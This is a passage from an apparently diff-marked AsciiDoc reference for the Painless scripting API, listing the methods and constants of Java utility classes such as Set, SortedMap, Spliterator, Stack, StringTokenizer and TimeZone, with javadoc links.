{java11-javadoc}/java.base/java/util/Random.html#nextBytes(byte%5B%5D)[nextBytes](byte[]) -* double {java11-javadoc}/java.base/java/util/Random.html#nextDouble()[nextDouble]() -* float {java11-javadoc}/java.base/java/util/Random.html#nextFloat()[nextFloat]() -* double {java11-javadoc}/java.base/java/util/Random.html#nextGaussian()[nextGaussian]() -* int {java11-javadoc}/java.base/java/util/Random.html#nextInt()[nextInt]() -* int {java11-javadoc}/java.base/java/util/Random.html#nextInt(int)[nextInt](int) -* long {java11-javadoc}/java.base/java/util/Random.html#nextLong()[nextLong]() -* void {java11-javadoc}/java.base/java/util/Random.html#setSeed(long)[setSeed](long) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-RandomAccess]] -==== RandomAccess -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Set]] -==== Set -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-SimpleTimeZone]] -==== SimpleTimeZone -* static int {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#STANDARD_TIME[STANDARD_TIME] -* static int {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#UTC_TIME[UTC_TIME] -* static int {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#WALL_TIME[WALL_TIME] -* {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#(int,java.lang.String,int,int,int,int,int,int,int,int)[SimpleTimeZone](int, null, int, int, int, int, int, int, int, int) -* {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#(int,java.lang.String,int,int,int,int,int,int,int,int,int)[SimpleTimeZone](int, null, int, int, int, int, int, int, int, int, int) -* {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#(int,java.lang.String,int,int,int,int,int,int,int,int,int,int,int)[SimpleTimeZone](int, null, int, int, int, int, int, int, int, int, int, int, int) -* {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#(int,java.lang.String)[SimpleTimeZone](int, null) -* def {java11-javadoc}/java.base/java/util/TimeZone.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#getDSTSavings()[getDSTSavings]() -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName()[getDisplayName]() -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(boolean,int)[getDisplayName](boolean, int) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(boolean,int,java.util.Locale)[getDisplayName](boolean, int, Locale) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getID()[getID]() -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getOffset(long)[getOffset](long) -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getOffset(int,int,int,int,int,int)[getOffset](int, int, int, int, int, int) -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getRawOffset()[getRawOffset]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#hasSameRules(java.util.TimeZone)[hasSameRules](TimeZone) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#inDaylightTime(java.util.Date)[inDaylightTime](Date) -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#observesDaylightTime()[observesDaylightTime]() -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setDSTSavings(int)[setDSTSavings](int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setEndRule(int,int,int)[setEndRule](int, int, int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setEndRule(int,int,int,int)[setEndRule](int, int, int, int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setEndRule(int,int,int,int,boolean)[setEndRule](int, int, int, int, boolean) -* void {java11-javadoc}/java.base/java/util/TimeZone.html#setRawOffset(int)[setRawOffset](int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setStartRule(int,int,int)[setStartRule](int, int, int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setStartRule(int,int,int,int)[setStartRule](int, int, int, int) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setStartRule(int,int,int,int,boolean)[setStartRule](int, int, int, int, boolean) -* void {java11-javadoc}/java.base/java/util/SimpleTimeZone.html#setStartYear(int)[setStartYear](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* ZoneId {java11-javadoc}/java.base/java/util/TimeZone.html#toZoneId()[toZoneId]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#useDaylightTime()[useDaylightTime]() - - -[[painless-api-reference-shared-SortedMap]] -==== SortedMap -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* Comparator {java11-javadoc}/java.base/java/util/SortedMap.html#comparator()[comparator]() -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* def {java11-javadoc}/java.base/java/util/SortedMap.html#firstKey()[firstKey]() -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#headMap(java.lang.Object)[headMap](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/SortedMap.html#lastKey()[lastKey]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#subMap(java.lang.Object,java.lang.Object)[subMap](def, def) -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#tailMap(java.lang.Object)[tailMap](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-SortedSet]] -==== SortedSet -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* Comparator {java11-javadoc}/java.base/java/util/SortedSet.html#comparator()[comparator]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#first()[first]() -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#headSet(java.lang.Object)[headSet](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#last()[last]() -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#subSet(java.lang.Object,java.lang.Object)[subSet](def, def) -* double sum() -* double sum(ToDoubleFunction) -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#tailSet(java.lang.Object)[tailSet](def) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Spliterator]] -==== Spliterator -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#CONCURRENT[CONCURRENT] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#DISTINCT[DISTINCT] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#IMMUTABLE[IMMUTABLE] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#NONNULL[NONNULL] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#ORDERED[ORDERED] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#SIZED[SIZED] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#SORTED[SORTED] -* static int {java11-javadoc}/java.base/java/util/Spliterator.html#SUBSIZED[SUBSIZED] -* int {java11-javadoc}/java.base/java/util/Spliterator.html#characteristics()[characteristics]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Spliterator.html#estimateSize()[estimateSize]() -* void {java11-javadoc}/java.base/java/util/Spliterator.html#forEachRemaining(java.util.function.Consumer)[forEachRemaining](Consumer) -* Comparator {java11-javadoc}/java.base/java/util/Spliterator.html#getComparator()[getComparator]() -* long {java11-javadoc}/java.base/java/util/Spliterator.html#getExactSizeIfKnown()[getExactSizeIfKnown]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#hasCharacteristics(int)[hasCharacteristics](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#tryAdvance(java.util.function.Consumer)[tryAdvance](Consumer) -* Spliterator {java11-javadoc}/java.base/java/util/Spliterator.html#trySplit()[trySplit]() - - -[[painless-api-reference-shared-Spliterator-OfDouble]] -==== Spliterator.OfDouble -* int {java11-javadoc}/java.base/java/util/Spliterator.html#characteristics()[characteristics]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Spliterator.html#estimateSize()[estimateSize]() -* void {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* Comparator {java11-javadoc}/java.base/java/util/Spliterator.html#getComparator()[getComparator]() -* long {java11-javadoc}/java.base/java/util/Spliterator.html#getExactSizeIfKnown()[getExactSizeIfKnown]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#hasCharacteristics(int)[hasCharacteristics](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#tryAdvance(java.lang.Object)[tryAdvance](def) -* Spliterator.OfDouble {java11-javadoc}/java.base/java/util/Spliterator$OfDouble.html#trySplit()[trySplit]() - - -[[painless-api-reference-shared-Spliterator-OfInt]] -==== Spliterator.OfInt -* int {java11-javadoc}/java.base/java/util/Spliterator.html#characteristics()[characteristics]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Spliterator.html#estimateSize()[estimateSize]() -* void {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* Comparator {java11-javadoc}/java.base/java/util/Spliterator.html#getComparator()[getComparator]() -* long {java11-javadoc}/java.base/java/util/Spliterator.html#getExactSizeIfKnown()[getExactSizeIfKnown]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#hasCharacteristics(int)[hasCharacteristics](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#tryAdvance(java.lang.Object)[tryAdvance](def) -* Spliterator.OfInt {java11-javadoc}/java.base/java/util/Spliterator$OfInt.html#trySplit()[trySplit]() - - -[[painless-api-reference-shared-Spliterator-OfLong]] -==== Spliterator.OfLong -* int {java11-javadoc}/java.base/java/util/Spliterator.html#characteristics()[characteristics]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Spliterator.html#estimateSize()[estimateSize]() -* void {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* Comparator {java11-javadoc}/java.base/java/util/Spliterator.html#getComparator()[getComparator]() -* long {java11-javadoc}/java.base/java/util/Spliterator.html#getExactSizeIfKnown()[getExactSizeIfKnown]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#hasCharacteristics(int)[hasCharacteristics](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#tryAdvance(java.lang.Object)[tryAdvance](def) -* Spliterator.OfLong {java11-javadoc}/java.base/java/util/Spliterator$OfLong.html#trySplit()[trySplit]() - - -[[painless-api-reference-shared-Spliterator-OfPrimitive]] -==== Spliterator.OfPrimitive -* int {java11-javadoc}/java.base/java/util/Spliterator.html#characteristics()[characteristics]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Spliterator.html#estimateSize()[estimateSize]() -* void {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* Comparator {java11-javadoc}/java.base/java/util/Spliterator.html#getComparator()[getComparator]() -* long {java11-javadoc}/java.base/java/util/Spliterator.html#getExactSizeIfKnown()[getExactSizeIfKnown]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator.html#hasCharacteristics(int)[hasCharacteristics](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* boolean {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#tryAdvance(java.lang.Object)[tryAdvance](def) -* Spliterator.OfPrimitive {java11-javadoc}/java.base/java/util/Spliterator$OfPrimitive.html#trySplit()[trySplit]() - - -[[painless-api-reference-shared-Spliterators]] -==== Spliterators -* static Spliterator.OfDouble {java11-javadoc}/java.base/java/util/Spliterators.html#emptyDoubleSpliterator()[emptyDoubleSpliterator]() -* static Spliterator.OfInt {java11-javadoc}/java.base/java/util/Spliterators.html#emptyIntSpliterator()[emptyIntSpliterator]() -* static Spliterator.OfLong {java11-javadoc}/java.base/java/util/Spliterators.html#emptyLongSpliterator()[emptyLongSpliterator]() -* static Spliterator {java11-javadoc}/java.base/java/util/Spliterators.html#emptySpliterator()[emptySpliterator]() -* static Iterator {java11-javadoc}/java.base/java/util/Spliterators.html#iterator(java.util.Spliterator)[iterator](Spliterator) -* static Spliterator {java11-javadoc}/java.base/java/util/Spliterators.html#spliterator(java.util.Collection,int)[spliterator](Collection, int) -* static Spliterator {java11-javadoc}/java.base/java/util/Spliterators.html#spliterator(java.util.Iterator,long,int)[spliterator](Iterator, long, int) -* static Spliterator {java11-javadoc}/java.base/java/util/Spliterators.html#spliteratorUnknownSize(java.util.Iterator,int)[spliteratorUnknownSize](Iterator, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Stack]] -==== Stack -* {java11-javadoc}/java.base/java/util/Stack.html#()[Stack]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#addElement(java.lang.Object)[addElement](def) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/Vector.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#copyInto(java.lang.Object%5B%5D)[copyInto](Object[]) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Vector.html#elementAt(int)[elementAt](int) -* Enumeration {java11-javadoc}/java.base/java/util/Vector.html#elements()[elements]() -* boolean {java11-javadoc}/java.base/java/util/Stack.html#empty()[empty]() -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* def {java11-javadoc}/java.base/java/util/Vector.html#firstElement()[firstElement]() -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* void {java11-javadoc}/java.base/java/util/Vector.html#insertElementAt(java.lang.Object,int)[insertElementAt](def, int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* def {java11-javadoc}/java.base/java/util/Vector.html#lastElement()[lastElement]() -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* int {java11-javadoc}/java.base/java/util/Vector.html#lastIndexOf(java.lang.Object,int)[lastIndexOf](def, int) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/Stack.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Stack.html#pop()[pop]() -* def {java11-javadoc}/java.base/java/util/Stack.html#push(java.lang.Object)[push](def) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#removeAllElements()[removeAllElements]() -* boolean {java11-javadoc}/java.base/java/util/Vector.html#removeElement(java.lang.Object)[removeElement](def) -* void {java11-javadoc}/java.base/java/util/Vector.html#removeElementAt(int)[removeElementAt](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Stack.html#search(java.lang.Object)[search](def) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* void {java11-javadoc}/java.base/java/util/Vector.html#setElementAt(java.lang.Object,int)[setElementAt](def, int) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StringJoiner]] -==== StringJoiner -* {java11-javadoc}/java.base/java/util/StringJoiner.html#(java.lang.CharSequence)[StringJoiner](CharSequence) -* {java11-javadoc}/java.base/java/util/StringJoiner.html#(java.lang.CharSequence,java.lang.CharSequence,java.lang.CharSequence)[StringJoiner](CharSequence, CharSequence, CharSequence) -* StringJoiner {java11-javadoc}/java.base/java/util/StringJoiner.html#add(java.lang.CharSequence)[add](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/StringJoiner.html#length()[length]() -* StringJoiner {java11-javadoc}/java.base/java/util/StringJoiner.html#merge(java.util.StringJoiner)[merge](StringJoiner) -* StringJoiner {java11-javadoc}/java.base/java/util/StringJoiner.html#setEmptyValue(java.lang.CharSequence)[setEmptyValue](CharSequence) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StringTokenizer]] -==== StringTokenizer -* {java11-javadoc}/java.base/java/util/StringTokenizer.html#(java.lang.String)[StringTokenizer](null) -* {java11-javadoc}/java.base/java/util/StringTokenizer.html#(java.lang.String,java.lang.String)[StringTokenizer](null, null) -* {java11-javadoc}/java.base/java/util/StringTokenizer.html#(java.lang.String,java.lang.String,boolean)[StringTokenizer](null, null, boolean) -* int {java11-javadoc}/java.base/java/util/StringTokenizer.html#countTokens()[countTokens]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/util/Enumeration.html#hasMoreElements()[hasMoreElements]() -* boolean {java11-javadoc}/java.base/java/util/StringTokenizer.html#hasMoreTokens()[hasMoreTokens]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Enumeration.html#nextElement()[nextElement]() -* null {java11-javadoc}/java.base/java/util/StringTokenizer.html#nextToken()[nextToken]() -* null {java11-javadoc}/java.base/java/util/StringTokenizer.html#nextToken(java.lang.String)[nextToken](null) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TimeZone]] -==== TimeZone -* static int {java11-javadoc}/java.base/java/util/TimeZone.html#LONG[LONG] -* static int {java11-javadoc}/java.base/java/util/TimeZone.html#SHORT[SHORT] -* static null[] {java11-javadoc}/java.base/java/util/TimeZone.html#getAvailableIDs()[getAvailableIDs]() -* static null[] {java11-javadoc}/java.base/java/util/TimeZone.html#getAvailableIDs(int)[getAvailableIDs](int) -* static TimeZone {java11-javadoc}/java.base/java/util/TimeZone.html#getDefault()[getDefault]() -* static TimeZone {java11-javadoc}/java.base/java/util/TimeZone.html#getTimeZone(java.lang.String)[getTimeZone](null) -* def {java11-javadoc}/java.base/java/util/TimeZone.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getDSTSavings()[getDSTSavings]() -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName()[getDisplayName]() -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(boolean,int)[getDisplayName](boolean, int) -* null {java11-javadoc}/java.base/java/util/TimeZone.html#getDisplayName(boolean,int,java.util.Locale)[getDisplayName](boolean, int, Locale) -* null 